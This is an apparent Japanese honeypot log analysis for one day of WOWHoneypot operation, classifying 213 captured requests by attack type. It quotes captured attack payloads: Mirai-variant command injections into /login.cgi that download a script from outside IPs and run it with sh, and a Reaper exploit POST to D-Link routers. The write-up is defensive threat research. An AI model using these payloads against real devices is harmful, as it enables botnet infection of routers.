WOWHoneypot簡易分析(18日目)
WOWhoneypotの2018/6/21(木)(運用18日目)の簡易分析です。
本日の総アクセスログは213件です。
件数 日付 メソッド パス
153 2018-06-21 POST /command.php
39 2018-06-21 GET /
11 2018-06-21 HEAD /
1 2018-06-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
1 2018-06-21 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-06-21 GET /phpMyAdmin/scripts/setup.php
1 2018-06-21 GET /manager/html
1 2018-06-21 GET /stssys.htm
1 2018-06-21 GET /cgi/common.cgi
1 2018-06-21 GET /xxbb
1 2018-06-21 GET /ccvv
1 2018-06-21 GET hxxp://httpheader[.]net/
1 2018-06-21 GET hxxp://114.215.240[.]151:83/index.php
本日はだいぶ傾向が変わりました。
1. Reaper
同一IPから連続して/command.phpに対しPOSTが投げられています。これは5日目、11日目にも来ていたReaper というIoTボットネット/マルウェアが対象としている D-Link DIR-600とDIR-300 への攻撃と思われます。アクセス件数も同じです。
同一IPからのアクセスの流れは以下になります。GETで存在調査をした後exploitが実行されます。ハニポが200 OKを返している事によりうまく拾えているものですね。
GET /cgi/common.cgi
GET /stssys.htm
GET /
POST /command.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt
2. Mirai亜種Satori/Shinoa
1件→8件→33件→16件→5件→5件→2件と数はだいぶ少なくなりました。何かISP等で対策され少なくなったのでしょうか。
ただし、世間的には前日からの傾向ですが、取得先IPが変化したものが出ているのも気になります。どちらも同じく「User-Agent: Hello, World」のため同一の攻撃と思われます。
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://217.61.6[.]127/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
3. パスにURLを入れた通信
パスにURLを入れることで、うまく処理していない場合に該当URLへアクセスが発生すると思われ、そういったサイトを調査しているものと思われます。
GET hxxp://httpheader[.]net/
表示される画像を見ると、httpヘッダが表示されるようです。
GET hxxp://114.215.240[.]151:83/index.php
4. その他既知のもの
GET /phpMyAdmin/scripts/setup.php → phpMyAdmin
GET /manager/html →Tomcatの管理ページが存在するかの調査
GET /xxbb →スキャンツールzgrabを使ったスキャン(詳細不明)
GET /ccvv →上記とセットで同じIPからくるスキャン(詳細不明)
ハンティングログは以下です。Mirai亜種のみです。
1 [2018-06-21 wget hxxp://217.61.6.127/t
1 [2018-06-21 wget hxxp://185.62.190.191/r
この設定の強化もしたいところですが…。
以上です。